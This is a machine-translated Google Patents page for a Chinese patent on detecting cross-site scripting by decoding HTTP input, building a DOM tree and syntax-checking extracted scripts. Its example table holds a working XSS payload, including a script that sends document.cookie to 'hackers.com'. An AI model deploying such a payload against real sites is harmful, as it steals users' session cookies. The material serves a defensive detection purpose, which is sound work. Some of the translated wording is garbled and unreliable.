CN101459548A - Script injection attack detection method and system - Google Patents
Script injection attack detection method and system Download PDFInfo
- Publication number
- CN101459548A CN101459548A CNA2007101795383A CN200710179538A CN101459548A CN 101459548 A CN101459548 A CN 101459548A CN A2007101795383 A CNA2007101795383 A CN A2007101795383A CN 200710179538 A CN200710179538 A CN 200710179538A CN 101459548 A CN101459548 A CN 101459548A
- Authority
- CN
- China
- Prior art keywords
- script
- object model
- document object
- user input
- input data
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Granted
Links
Images
Abstract
A script injection and attacking detection method and a system belong to the technical field of computing network, wherein the method comprises requesting and obtaining by HTTP, extracting user input data from HTTP request, doing script injection and attacking detection to user input data, and alarming script injection and attacking affairs and the like, wherein script injection and attacking detection step to user input data comprises decoding user input data, analyzing document object model structure, extracting document object model script and detecting script grammar and the like. The script injection and attacking detection system comprises an HTTP requesting and obtaining module, a user inputting data extraction module, a script injection and attacking module and a script injection and attacking alarm module, wherein the script injection and attacking detection module comprises a user input data decoding module, a document object model structure analyzing module, an injection script extracting module and a script grammar detecting module. The script injection and attacking detection method and the system are suitable for applying in Web service security insurance products.
Description
Technical field
The present invention relates to a kind of script injection attack detection method and system, belong to technical field of the computer network.
Background technology
Since the Web technology was born, the internet had obtained develop rapidly, and Web service also becomes topmost Web content presentation mode in the current internet.Along with the development of Web technology, Web is no longer only for the Internet user provides the static content service, and can provide various Dynamic Web content services according to user's needs.Because Web service has easy deployment and advantage such as easy-to-use, the application of now a lot of legacy clients/server modes all begins to be transformed into the application based on Web, comprises that those are to application such as very high e-bank of safety requirements and electronics security.
Web service has also brought a lot of safety problems when offering convenience for people's live and work.These safety problems comprise the security attack incidents such as SQL injection attacks, apocrypha execution and the object accesses of going beyond one's commission that threaten Web server safety, also comprise the security attack incidents such as script injection attacks that threaten the Web client secure.Organize the OWASP statistics according to the opening of internationally famous Web safety, 2007, script injection attacks incident (comprise the cross-site scripting attack incident, it belongs to script injection attacks category) occupy first of the ten big Web security incidents.Organize 2002 to 2007 statistics about script injection attacks incident in CVE storehouse from international vulnerability database, the occurrence frequency of script injection attacks security incident just is being growth trend year by year.
What the script injection attacks existed has its source in: there is defective in Web server equation code, it fails user input data is endured strict scrutiny and filters, to such an extent as to malicious attacker can be injected malicious script by user input fields, the malicious script of these injections can reflex to victim's Web browser by Web server and carry out, and steals victim's sensitive data or carry out purpose such as malicious action under victim's safe context environment thereby reach.
Since the script injection attacks was found, people had begun the research of detection of script injection attacks and defence aspect.We can be divided into these research two classes: detect and defence based on the Web service end with based on the script injection attacks of Web client.Comprise mainly that based on detection of Web service end script injection attacks and defence method content safety coding, html tag filter, wherein, the content safety coding method is that user input data is unified the text formatting coding, avoids the Web client that the text of user's input is used as the html format data
]Make an explanation, this method need just consider when the Web application service is developed that a lot of Web application developer do not have the experience of this respect; The responsive label that html tag exists in filtering and being meant in the web application code user input data filters, perhaps by the security gateway that is deployed in the Web server front end the responsive html tag that exists in the user input data is filtered, this method exists filters not strict or filtering rule such as easily hides at problem.Detection of script injection attacks and defence method based on the Web client comprise that mainly script executing is forbidden, http response message purifies and Web client data stream tracking.Wherein, script executing forbids that method then is completely or partially to forbid the execution of script in the Web client, and this will make some web content correctly to present; Http response message purification method is that the Web content of pages that returns from the Web service end is filtered, wash the script that those may endanger client secure, this kind method shortcoming is, exists data cleansing clean or clean and too cause the Web content of pages correctly to present; Web client data stream tracking comprises based on other static data flow of source code level to be followed the tracks of and based on the trace analysis method of input traffic and output stream, this method need be revised the Web client software, exists to dispose and performance difficulty.
Summary of the invention
The invention provides a kind of script injection attack detection method and system.Script attack detection method of the present invention and system belong to Web service end solution, it has kept Web service end pattern script injection attack detection method and the system advantage on disposing and implementing, utilize technology such as user input data decoding, DOM Document Object Model analysis, the extraction of DOM Document Object Model script and the detection of script grammer simultaneously, overcome the more high shortcoming of failing to report of Traditional Web services end script injection attack detection method and system existence, improved the detection accuracy of Web service end script injection attack detection method and system greatly.
The technical solution adopted for the present invention to solve the technical problems is:
A kind of script injection attack detection method comprises:
The step of HTTP acquisition request;
From the HTTP request, extract the step of user input data;
User input data is carried out the step that the script injection attacks detects;
The step of script injection attacks affair alarm;
Wherein, described step of user input data being carried out the detection of script injection attacks; Comprise:
The step of user input data decoding;
The step of DOM Document Object Model structural analysis;
The step of from document object model tree, extracting script and the script that extracts being carried out grammer detection etc.;
Just produce the warning of script injection attacks as long as from user input data, extract at least one section correct script of grammer.
Preferably, the user input data decoding step of described script injection attack detection method comprises based on the decoding step of HTTP coding criterion with based on the decoding step of HTML coding criterion.
Preferably, the DOM Document Object Model structural analysis step of described script injection attack detection method is: regard decoded user input data the content of one section html format as, according to html document object model standard decoded user input data is converted to a document object model tree that meets the html document object model.
Preferably, the script that extracts from document object model tree of described script injection attack detection method comprises JavaScript script and VBScript script.
Preferably, the step of extracting script from document object model tree of described script injection attack detection method is the combination in any of following 5 kinds of script extracting methods:
A) from document object model tree each<script extract the Javascript/VBScript script the label;
B) from the event-driven function of each html tag of document object model tree, extract the Javascript/VBScript script;
C) from the particular attribute-value of each html tag of document object model tree, extract the Javascript/VBScript script;
D) from document object model tree each<STYLE extract the Javascript/VBScript script the CSS of label definition;
E) from the CSS that the Style attribute of each html tag of document object model tree is introduced, extract the JavaScript/VBScript script.
Preferably, the script to extracting of described script injection attack detection method carries out grammer detection step: if the script that extracts is the Javascript script, then adopts standard Javascript syntax gauge that the JavaScript script that extracts is carried out grammer and detect; If the script type of extracting is VBScript, then adopts standard VBScript syntax gauge that the VBScript script that extracts is carried out grammer and detect.
A kind of script injection attack detection system comprises:
Be used to obtain the HTTP acquisition request module of HTTP request message to be detected;
Be used for extracting the user input data extraction module of user input data from the HTTP request message that obtains;
Be used for the user input data that extracts is carried out the script injection attacks detection module that the script injection attacks detects;
Be used to the script injection attacks alarm module that produces script injection attacks incident and notify the safety officer;
Described script injection attacks detection module comprises:
Receive user input data, the user input data decoder module of decoding according to HTTP coding criterion and HTML coding criterion;
Receive the decoded data of user input data decoder module output, construct the DOM Document Object Model structural analysis module of corresponding document object model tree according to html document object model standard;
Receive the document object model tree of DOM Document Object Model structural analysis module output, therefrom extract the injection script extraction module of all possible Javascript/VBScript script;
Receive the JavaScript/VBScript script that DOM Document Object Model script extraction module extracts, according to the JavaScript/VBScript syntax gauge it is carried out the grammaticality analysis, as long as from the HTTP request, extract at least one section JavaScript/VBScript script that grammer is correct, just produce the script grammer detection module that the script injection attacks is reported to the police;
The annexation of each submodule in the described script injection attacks detection module is as follows: described user input data decoder module receives the user input data that the user input data extraction module extracts, and carrying out decode operation, decoded user input data is exported to described DOM Document Object Model structural analysis module; Described DOM Document Object Model structural analysis module receives the decoded user input data from the output of user input data decoder module, construct corresponding document object model tree according to html document object model standard, and export to described injection script extraction module; Described injection script extraction module receives the document object model tree of DOM Document Object Model structural analysis module output, therefrom extracts all possible injection script; Described script grammer detection module receives the injection script that DOM Document Object Model script extraction module extracts, according to the script syntax gauge it is carried out the grammaticality analysis, as long as from the HTTP request, extract at least one section injection script that grammer is correct, just produce the warning of script injection attacks and send script injection attacks alarm module to; Described script injection attacks alarm module receives the warning from script grammer detection module, and constructs a script injection attacks affair alarm, and sends the controlling alarm platform to.
Preferably, described script injection attack detection system, it is when producing the warning of script injection attacks, with the alarm content of whole HTTP request message as script injection attacks incident.
Beneficial effect of the present invention: the present invention has kept Web service end pattern script injection attack detection method and the system advantage on disposing and implementing, adopt HTTP decoding and HTML decoding technique that user input data is decoded, effectively resist various common hackers and hide technology; Decoded user input data is carried out DOM Document Object Model structural analysis structure document object model tree, by each html tag in the traversal document object model tree extract comprehensively the injection script that might exist, and detect engine by the script grammer script is carried out the grammer detection, just produce script injection attacks alert event when only detecting the correct script of at least one grammer, compare with Traditional Web services end script injection attack detection method, script injection attack detection method of the present invention has improved the comprehensive and accuracy of detection of detection of Web service end script injection attack detection method greatly.
Description of drawings
Fig. 1 is a script injection attacks testing process of the present invention;
The user input data of Fig. 2 for from the HTTP request message, extracting;
Fig. 3 is the document object model tree embodiment by the user input data conversion;
Fig. 4 is injection script grammaticality testing process figure of the present invention;
Fig. 5 is script injection attack detection system modular structure figure of the present invention.
The present invention is further described below in conjunction with drawings and Examples.
Embodiment
As shown in Figure 1, script injection attack detection method of the present invention comprises that the HTTP request message obtains 101, extracts user input data 102 from the HTTP request, user input data is carried out data decode 103, decoded user input data is carried out DOM Document Object Model structural analysis 104, extracts and extract injection script 105 comprehensively, the injection script that extracts is carried out grammaticality detect 106 and produce steps such as script injection attacks alert event 107 from document object model tree.
HTTP request message obtaining step 101 of the present invention includes but not limited to following three kinds of modes:
1) HTTP Proxy mode;
2) the embedded mode of Web server;
3) passive obtain manner.
HTTP acquisition request mode based on HTTP Proxy comprises: 1) act on behalf of in Web user network end administration client side HTTP and intercept and capture all HTTP request messages that mail to Web server; 2), intercept and capture all HTTP requests of mailing to its protected Web server in backstage at Web server end administration HTTP Proxy.
Be meant by add third party's plug-in unit mode for the particular Web server software module based on the embedded mode of Web server and obtain the HTTP request message that all will be handled by this web server software.Such as, for Apache Server software, can be by the open api interface exploitation third party plug-in unit of Apache Server software, before Apache Server software is formally handled this HTTP request, whether be a script injection attacks by scanning that this HTTP asks to detect; (InternetInformation Server IIS), can write an interception and detect the filtration plug-in unit of HTTP request message by its open filter plug-in API for the Internet information server of Microsoft.
Passive mode is obtained the HTTP request message and is meant with all network packet relevant with http protocol in the passive mode collection present networks, perhaps collect all network packet relevant of the audiomonitor of flowing through, obtain the HTTP request message through steps such as the processing of network packet fragment, the reorganization of tcp data stream and http protocol analyses with http protocol with passive mode.The pattern of this passive HTTP of obtaining request message relatively be suitable for intruding detection system (Intrusion Detection System, IDS) and the intrusion prevention system product (Intrusion Protection System, IPS);
After getting access to the HTTP request message, next step is carried out and extract all user input data steps from the HTTP request message.As shown in Figure 2, script injection attack detection method of the present invention is following 4 agreement thresholdings of extracting in the HTTP request message 200 when extracting user input data: URL parameter 210, COOKIE value 220, Referer value 230 and form data 240.
Extract user input data in the specified protocol territory from the HTTP request message after, next step then is the decoding step of carrying out user input data.At first the protocol domain data are carried out title and right the cutting apart of value according to each protocol domain coding criterion.For URL parameter protocol territory coded system is by address character '; ' a plurality of name-value of cutting apart character string to forming, such as, Name1=VAL1﹠amp; Name2=VAL2 needs here at first according to ‘ ﹠amp; ' character string is cut, and then cut by '=', obtain user input data value VAL1 and VAL2.COOKIE protocol domain coding criterion and URL parameter protocol and coded system are similar substantially, and difference is that the right decollator of its name-value is not ’ ﹠amp; ', but '; ' character.Referer protocol domain and form data basic coding standard and URL parameter coding standard are identical, and therefore, the extracting mode of user input data is also identical.
Extract user input data from each specified protocol territory of HTTP request message after, next step then carries out the decoding step to user input data.Here the decoding to user input data comprises based on the decoding of http protocol coding criterion and the decoding of HTML protocol code standard.
According to the http protocol coding criterion: a space will be encoded as '+', and other can not character display or has the character of special implication to be encoded as ' hexadecimal code of %XX '.Such as, character '=' will be encoded as ' %3D '.Therefore, the http protocol here is decoded as: with in the user input data '+', and character becomes space character (hexadecimal value is 0x20), will ' %XX ' single-byte character that to be decoded as its hexadecimal value be 0xXX.
According to HTML protocol code standard: the character with special implication may be encoded to following several mode: friendly coded system; Decimal coded mode and hexadecimal code mode.Such as the quotation marks character by the friendly coded system ’ ﹠amp that will encode; Quot; ', will be encoded to ’ ﹠amp by the decimal coded mode; #39; ', will be encoded as ’ ﹠amp by the hexadecimal code mode; #27; '.Therefore, the HTML coding/decoding method here is it is decoded into its pairing original character again.
After the HTTP decoding and HTML decoding finished user input data, we will carry out the DOM Document Object Model structural analysis to decoded user input data.We regard whole decoding back user input data as one section html format data, adopt standard html document object model structure analysis method to be converted into a document object model tree then.Accompanying drawing 3 is for being converted to user input data in the table 1 embodiment of document object model tree.
The decoded user input data example of table 1
‘><style>A{star:expression(onmouseover=function(){this.style.backgroundColor="#FF0000";},
onmouseout=function(){this.style.backgroundColor="#FFFFFF";})}</style>
<div?align>
<font?size=5?style=“width:expression(alert(document.cookie))”onmouseover=”alert(123)”>
<A?href=”javascript:alert(document.cookie)”>please?click?me</A>Hello.how?are?you?
<script?type=”text/Javascript”>
var?img=new?Image();img.src=‘http://hackers.com/’+document.cookie;
</script>
</font>
</div>
In the accompanying drawing 3, the DOM Document Object Model structure after the conversion is a tree, wherein, the empty node of Root node 300 expressions, plain text content node of Text1 node 301 expressions, its text data is " ' "; STYLE label of Style node 302 expressions, its defined CSS is represented by its child node Text4 node 304; DIV label of DIV node 303 expressions; FONT label of Font node 305 expressions, the injection script that its STYLE property value is introduced also is stored in this node; Achor label of Achor node 306 expressions, the injection script that its href attribute is introduced is stored in this node; Plain text node of Text2 node 307 expression, its content of text is " hello.how are you? " One<SCRIPT of Script node 308 expression〉label, should<script〉the Javascript script directly introduced of label is stored in the content of text of its child node Text3 node 309.
After decoded user input data is converted to document object model tree, the step of extracting injection script from document object model tree will be carried out.Here will travel through each html tag in the entire document object model tree, extract all possible injection script comprehensively.
It is of the present invention that to extract the injection script step from document object model tree be the combination in any of following 5 kinds of script extracting methods:
A) from document object model tree each<script extract the Javascript/VBScript script the label; For example, the Script node 308 in the accompanying drawing 3, the JavaScript injection script of its introducing are the content of text of its child node Text3 node 309;
B) from the event-driven function of each html tag of document object model tree, extract the Javascript/VBScript script; For example, the injection script of the onmouseover event-driven function of the Font node 305 in the accompanying drawing 3 introducing;
C) from the particular attribute-value of each html tag of document object model tree, extract the Javascript/VBScript script; For example, the Achor node 306 in the accompanying drawing 3, its href attribute is introduced injection script by the javascript prefix;
D) from document object model tree each<STYLE extract the Javascript/VBScript script the CSS of label definition; For example, the Style node 302 in the accompanying drawing 3, the CSS of its definition are stored in the content of text data of its child node Text4 node 304;
E) from the CSS that the Style attribute of each html tag of document object model tree is introduced, extract the JavaScript/VBScript script; For example, the Font node 305 in the accompanying drawing 3 is introduced injection script by expression in the defined CSS of its Style attribute.
Finish from document object model tree extract injection script after, next step will carry out grammaticality detection to the injection script that extracts.Script injection attack detection method of the present invention is supported the grammaticality of Javascript and two kinds of injection scripts of VBScript is detected simultaneously: if the script that extracts is the Javascript script, then adopts standard Javascript syntax gauge that the JavaScript script that extracts is carried out grammer and detect; If the script type of extracting is VBScript, then adopts standard VBScript syntax gauge that the VBScript script that extracts is carried out grammer and detect.
Fig. 4 is used to realize that for of the present invention injection script to extracting carries out grammaticality testing process figure.With Javascript type injection script is example, at first, morphological analysis rule 401 according to JavaScript morphology normalized definition definition Javascript script generates corresponding lexical analyzer by the lexical analyzer Core Generator according to morphological analysis rule 401 then; The lexical analyzer Core Generator here can adopt GNUFLEX lexical analyzer instrument, also can adopt other instrument; Then, according to JavaScript syntax gauge definition JavaScript rule governing parsing 402, generate corresponding syntax analyzer by the syntax analyzer Core Generator according to JavaScript rule governing parsing 402 then; The syntax analyzer Core Generator here can adopt GNU YACC/BISON instrument, also can adopt other instrument.When Javascript script grammaticality detected, each section JavaScript script 403 for extracting from document object model tree at first carried out morphological analysis via lexical analyzer 404, obtains a series of lexical token; These lexical tokens will be imported into syntactic analysis, and it 405 does the grammaticality analysis.Grammaticality detection for the VBScript type script that extracts from document object model tree is similar with JavaScript type script workflow, and the pairing morphological analysis rule of different just VBScript type scripts is different with rule governing parsing.
For all injection scripts that from document object model tree, extract,, then will trigger script injection attacks affair alarm if having at least one section injection script to pass through the grammaticality inspection of syntax analyzer.
Especially, when structure script injection attacks alert event,, whole HTTP request message can be included in the alert event detailed content territory for the whole script injection attacks of complete preservation love scene.
As shown in Figure 5, script injection attack detection system of the present invention comprises HTTP acquisition request module 510, user input data extraction module 520, script injection attacks detection module 530 and script injection attacks alarm module 540; Described script injection attacks detection module 530 comprises user input data decoder module 531, DOM Document Object Model analysis module 532, injection script extraction module 533 and script grammer detection module 534.
Described user input data decoder module 531 receives the user input data of user input data extraction module 520 outputs, decodes according to HTTP coding criterion and HTML coding criterion; Described DOM Document Object Model analysis module 532 receives the decoded data of user input data decoder module 531 outputs, constructs corresponding document object model tree according to html document object model standard; Described injection script extraction module 533 receives the document object model tree of DOM Document Object Model analysis module 532 outputs, therefrom extracts all possible Javascript/VBScript script; Described script grammer detection module 534 receives the JavaScript/VBScript script that injection script extraction module 533 extracts, and according to the grammaticality testing process shown in JavaScript/VBScript syntax gauge and the accompanying drawing 4 it is carried out the grammaticality analysis.As long as from the HTTP request message, extract at least one section JavaScript/VBScript script that grammer is correct, just produce the script injection attacks and report to the police.
Described script injection attacks affair alarm module 540 will be according to the testing result structure script injection attacks alert event of script injection attacks detection module 530.Especially, when making up script injection attacks alert event, with the alarm content of whole HTTP request message, so that keep whole script injection attacks love scene as script injection attacks incident.
Claims (8)
1. script injection attack detection method, comprise the HTTP acquisition request, from the HTTP request, extract user input data, user input data is carried out the step of detection of script injection attacks and script injection attacks affair alarm, it is characterized in that: describedly user input data is carried out the step that the script injection attacks detects comprise the user input data decoding, the DOM Document Object Model structural analysis, from document object model tree, extract script and the script that extracts is carried out grammer detection step, just produce the warning of script injection attacks as long as from user input data, extract at least one section correct script of grammer.
2. a kind of script injection attack detection method as claimed in claim 1 is characterized in that, described user input data decoding step comprises based on the decoding step of HTTP coding criterion with based on the decoding step of HTML coding criterion.
3. a kind of script injection attack detection method as claimed in claim 1, it is characterized in that, described DOM Document Object Model structural analysis step is: regard decoded user input data the content of one section html format as, according to html document object model standard decoded user input data is converted to a document object model tree that meets the html document object model.
4. a kind of script injection attack detection method as claimed in claim 1 is characterized in that, the described script that extracts from document object model tree comprises JavaScript script and VBScript script.
5. a kind of script injection attack detection method as claimed in claim 1 is characterized in that, the described step of extracting script from document object model tree is the combination in any of following 5 kinds of script extracting methods:
1), from document object model tree each<script extract the Javascript/VBScript script the label;
2), from the event-driven function of each html tag of document object model tree, extract the Javascript/VBScript script;
3), from the particular attribute-value of each html tag of document object model tree, extract the Javascript/VBScript script;
4), from document object model tree each<STYLE extract the Javascript/VBScript script the CSS of label definition;
5), from the CSS that the Style attribute of each html tag of document object model tree is introduced, extract the JavaScript/VBScript script.
6. a kind of script injection attack detection method as claimed in claim 1, it is characterized in that, described script to extraction carries out grammer detection step: if the script that extracts is the Javascript script, then adopts standard Javascript syntax gauge that the JavaScript script that extracts is carried out grammer and detect; If the script type of extracting is VBScript, then adopts standard VBScript syntax gauge that the VBScript script that extracts is carried out grammer and detect.
7. a script injection attack detection system comprises HTTP acquisition request module, user input data extraction module, script injection attacks detection module and script injection attacks alarm module, it is characterized in that, described script injection attacks detection module comprises:
Reception is from the user input data of user input data extraction module output, the user input data decoder module of decoding according to HTTP coding criterion and HTML coding criterion;
Receive the decoded data of user input data decoder module output, construct the DOM Document Object Model structural analysis module of corresponding document object model tree according to html document object model standard;
Receive the document object model tree of DOM Document Object Model structural analysis module output, therefrom extract the injection script extraction module of all possible Javascript/VBScript script;
Receive the JavaScript/VBScript script that DOM Document Object Model script extraction module extracts, according to the JavaScript/VBScript syntax gauge it is carried out the grammaticality analysis, as long as from the HTTP request, extract at least one section JavaScript/VBScript script that grammer is correct, just produce the script grammer detection module that the script injection attacks is reported to the police;
8. a kind of script injection attack detection system as claimed in claim 7 is characterized in that, when producing the warning of script injection attacks, with the alarm content of whole HTTP request message as script injection attacks incident.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN2007101795383A CN101459548B (en) | 2007-12-14 | 2007-12-14 | Script injection attack detection method and system |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN2007101795383A CN101459548B (en) | 2007-12-14 | 2007-12-14 | Script injection attack detection method and system |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN101459548A true CN101459548A (en) | 2009-06-17 |
| CN101459548B CN101459548B (en) | 2011-10-12 |
Family
ID=40770191
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN2007101795383A Expired - Fee Related CN101459548B (en) | 2007-12-14 | 2007-12-14 | Script injection attack detection method and system |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN101459548B (en) |
Cited By (20)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN101741645A (en) * | 2009-12-17 | 2010-06-16 | 成都市华为赛门铁克科技有限公司 | Method, device and system for detecting storage-type cross-site scripting attack and attack detector |
| CN102469113A (en) * | 2010-11-01 | 2012-05-23 | 北京启明星辰信息技术股份有限公司 | Security gateway and method for forwarding webpage by using security gateway |
| CN102542201A (en) * | 2011-12-26 | 2012-07-04 | 北京奇虎科技有限公司 | Detection method and system for malicious codes in web pages |
| CN102833269A (en) * | 2012-09-18 | 2012-12-19 | 苏州山石网络有限公司 | Detection method and device for cross site scripting and firewall with device |
| CN103428249A (en) * | 2012-05-23 | 2013-12-04 | 腾讯科技(深圳)有限公司 | Collecting method and processing method for HTTP request packet, system and server |
| CN103441985A (en) * | 2013-07-25 | 2013-12-11 | 国家电网公司 | SQL injection vulnerability detection method for COOKIE mode |
| CN104348789A (en) * | 2013-07-30 | 2015-02-11 | 中国银联股份有限公司 | Web server and method for preventing cross-site scripting attack |
| US9021593B2 (en) | 2009-07-23 | 2015-04-28 | NSFOCUS Information Technology Co., Ltd. | XSS detection method and device |
| CN104573520A (en) * | 2013-10-09 | 2015-04-29 | 腾讯科技(深圳)有限公司 | Method and device for detecting permanent type cross site scripting vulnerability |
| CN104657271A (en) * | 2015-03-03 | 2015-05-27 | 成都金盘电子科大多媒体技术有限公司 | Automatic testing method for standard conformance of health information shared documents |
| CN104967589A (en) * | 2014-05-27 | 2015-10-07 | 腾讯科技(深圳)有限公司 | Security detection method, apparatus and system |
| CN106789899A (en) * | 2016-11-22 | 2017-05-31 | 中国银联股份有限公司 | A kind of cross-domain message method and device based on HTML5 |
| CN107948120A (en) * | 2016-10-12 | 2018-04-20 | 阿里巴巴集团控股有限公司 | leak detection method and device |
| CN108292408A (en) * | 2015-12-02 | 2018-07-17 | 都灵理工学院 | The method for detecting WEB follow-up services |
| CN108881101A (en) * | 2017-05-08 | 2018-11-23 | 腾讯科技(深圳)有限公司 | A kind of cross site scripting loophole defence method, device and client based on DOM Document Object Model |
| CN110881043A (en) * | 2019-11-29 | 2020-03-13 | 杭州迪普科技股份有限公司 | Method and device for detecting web server vulnerability |
| CN111371783A (en) * | 2020-03-02 | 2020-07-03 | 中国建设银行股份有限公司 | SQL injection attack detection method, device, equipment and storage medium |
| CN112039877A (en) * | 2020-08-28 | 2020-12-04 | 四川长虹电器股份有限公司 | KLD-based storage type XSS injection detection method |
| CN113872965A (en) * | 2021-09-26 | 2021-12-31 | 国网四川省电力公司乐山供电公司 | SQL injection detection method based on Snort engine |
| CN114500053A (en) * | 2022-01-27 | 2022-05-13 | 安徽华云安科技有限公司 | Code injection detection method and device, electronic equipment and readable storage medium |
Family Cites Families (2)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN100342692C (en) * | 2005-09-02 | 2007-10-10 | 杭州华三通信技术有限公司 | Invasion detecting device and invasion detecting system |
| US7721091B2 (en) * | 2006-05-12 | 2010-05-18 | International Business Machines Corporation | Method for protecting against denial of service attacks using trust, quality of service, personalization, and hide port messages |
-
2007
- 2007-12-14 CN CN2007101795383A patent/CN101459548B/en not_active Expired - Fee Related
Cited By (36)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN101964025B (en) * | 2009-07-23 | 2016-02-03 | 北京神州绿盟信息安全科技股份有限公司 | XSS detection method and equipment |
| US9021593B2 (en) | 2009-07-23 | 2015-04-28 | NSFOCUS Information Technology Co., Ltd. | XSS detection method and device |
| CN101741645A (en) * | 2009-12-17 | 2010-06-16 | 成都市华为赛门铁克科技有限公司 | Method, device and system for detecting storage-type cross-site scripting attack and attack detector |
| CN102469113A (en) * | 2010-11-01 | 2012-05-23 | 北京启明星辰信息技术股份有限公司 | Security gateway and method for forwarding webpage by using security gateway |
| CN102469113B (en) * | 2010-11-01 | 2014-08-20 | 北京启明星辰信息技术股份有限公司 | Security gateway and method for forwarding webpage by using security gateway |
| CN102542201A (en) * | 2011-12-26 | 2012-07-04 | 北京奇虎科技有限公司 | Detection method and system for malicious codes in web pages |
| CN102542201B (en) * | 2011-12-26 | 2015-01-21 | 北京奇虎科技有限公司 | Detection method and system for malicious codes in web pages |
| CN103428249A (en) * | 2012-05-23 | 2013-12-04 | 腾讯科技(深圳)有限公司 | Collecting method and processing method for HTTP request packet, system and server |
| CN103428249B (en) * | 2012-05-23 | 2016-02-03 | 深圳市腾讯计算机系统有限公司 | A kind of Collecting and dealing method of HTTP request bag, system and server |
| CN102833269A (en) * | 2012-09-18 | 2012-12-19 | 苏州山石网络有限公司 | Detection method and device for cross site scripting and firewall with device |
| CN102833269B (en) * | 2012-09-18 | 2016-03-30 | 山石网科通信技术有限公司 | The detection method of cross-site attack, device and there is the fire compartment wall of this device |
| CN103441985A (en) * | 2013-07-25 | 2013-12-11 | 国家电网公司 | SQL injection vulnerability detection method for COOKIE mode |
| CN103441985B (en) * | 2013-07-25 | 2016-09-21 | 国家电网公司 | A kind of SQL injection loophole detection method for COOKIE mode |
| CN104348789A (en) * | 2013-07-30 | 2015-02-11 | 中国银联股份有限公司 | Web server and method for preventing cross-site scripting attack |
| CN104348789B (en) * | 2013-07-30 | 2018-04-27 | 中国银联股份有限公司 | For preventing the Web server and method of cross-site scripting attack |
| CN104573520A (en) * | 2013-10-09 | 2015-04-29 | 腾讯科技(深圳)有限公司 | Method and device for detecting permanent type cross site scripting vulnerability |
| CN104573520B (en) * | 2013-10-09 | 2019-02-01 | 腾讯科技(深圳)有限公司 | The method and apparatus for detecting resident formula cross site scripting loophole |
| CN104967589A (en) * | 2014-05-27 | 2015-10-07 | 腾讯科技(深圳)有限公司 | Security detection method, apparatus and system |
| CN104967589B (en) * | 2014-05-27 | 2019-02-05 | 腾讯科技(深圳)有限公司 | A kind of safety detecting method, device and system |
| CN104657271A (en) * | 2015-03-03 | 2015-05-27 | 成都金盘电子科大多媒体技术有限公司 | Automatic testing method for standard conformance of health information shared documents |
| CN104657271B (en) * | 2015-03-03 | 2017-05-03 | 成都金盘电子科大多媒体技术有限公司 | Automatic testing method for standard conformance of health information shared documents |
| US11308502B2 (en) | 2015-12-02 | 2022-04-19 | Politecnico Di Torino | Method for detecting web tracking services |
| CN108292408A (en) * | 2015-12-02 | 2018-07-17 | 都灵理工学院 | The method for detecting WEB follow-up services |
| CN107948120B (en) * | 2016-10-12 | 2020-11-24 | 阿里巴巴集团控股有限公司 | Vulnerability detection method and device |
| CN107948120A (en) * | 2016-10-12 | 2018-04-20 | 阿里巴巴集团控股有限公司 | leak detection method and device |
| CN106789899A (en) * | 2016-11-22 | 2017-05-31 | 中国银联股份有限公司 | A kind of cross-domain message method and device based on HTML5 |
| CN108881101A (en) * | 2017-05-08 | 2018-11-23 | 腾讯科技(深圳)有限公司 | A kind of cross site scripting loophole defence method, device and client based on DOM Document Object Model |
| CN110881043A (en) * | 2019-11-29 | 2020-03-13 | 杭州迪普科技股份有限公司 | Method and device for detecting web server vulnerability |
| CN110881043B (en) * | 2019-11-29 | 2022-07-01 | 杭州迪普科技股份有限公司 | Method and device for detecting web server vulnerability |
| CN111371783A (en) * | 2020-03-02 | 2020-07-03 | 中国建设银行股份有限公司 | SQL injection attack detection method, device, equipment and storage medium |
| CN111371783B (en) * | 2020-03-02 | 2022-06-24 | 中国建设银行股份有限公司 | SQL injection attack detection method, device, equipment and storage medium |
| CN112039877A (en) * | 2020-08-28 | 2020-12-04 | 四川长虹电器股份有限公司 | KLD-based storage type XSS injection detection method |
| CN113872965A (en) * | 2021-09-26 | 2021-12-31 | 国网四川省电力公司乐山供电公司 | SQL injection detection method based on Snort engine |
| CN113872965B (en) * | 2021-09-26 | 2023-05-09 | 国网四川省电力公司乐山供电公司 | SQL injection detection method based on Snort engine |
| CN114500053A (en) * | 2022-01-27 | 2022-05-13 | 安徽华云安科技有限公司 | Code injection detection method and device, electronic equipment and readable storage medium |
| CN114500053B (en) * | 2022-01-27 | 2023-12-05 | 安徽华云安科技有限公司 | Code injection detection method and device, electronic equipment and readable storage medium |
Also Published As
| Publication number | Publication date |
|---|---|
| CN101459548B (en) | 2011-10-12 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| CN101459548B (en) | Script injection attack detection method and system | |
| US10164988B2 (en) | External link processing | |
| CN101471818B (en) | Detection method and system for malevolence injection script web page | |
| CN102129528B (en) | WEB page tampering identification method and system | |
| CN103559444B (en) | A kind of sql injects detection method and device | |
| CN101267357B (en) | A SQL injection attack detection method and system | |
| CN101895516B (en) | Method and device for positioning cross-site scripting attack source | |
| US7308648B1 (en) | Method, system, and computer-readable medium for filtering harmful HTML in an electronic document | |
| Shahriar et al. | S2XS2: a server side approach to automatically detect XSS attacks | |
| CN102469113B (en) | Security gateway and method for forwarding webpage by using security gateway | |
| US10325097B2 (en) | Static detection of context-sensitive cross-site scripting vulnerabilities | |
| CN101425937B (en) | SQL injection attack detection system suitable for high speed LAN environment | |
| US20150067839A1 (en) | Syntactical Fingerprinting | |
| Gupta et al. | XSS‐immune: a Google chrome extension‐based XSS defensive framework for contemporary platforms of web applications | |
| CN102833269B (en) | The detection method of cross-site attack, device and there is the fire compartment wall of this device | |
| CN109040097A (en) | A kind of defence method of cross-site scripting attack, device, equipment and storage medium | |
| CN101895517B (en) | Method and device for extracting script semantics | |
| Jaeger et al. | Multi-step attack pattern detection on normalized event logs | |
| Barhoom et al. | A new server-side solution for detecting cross site scripting attack | |
| Duraisamy et al. | A server side solution for protection of web applications from cross-site scripting attacks | |
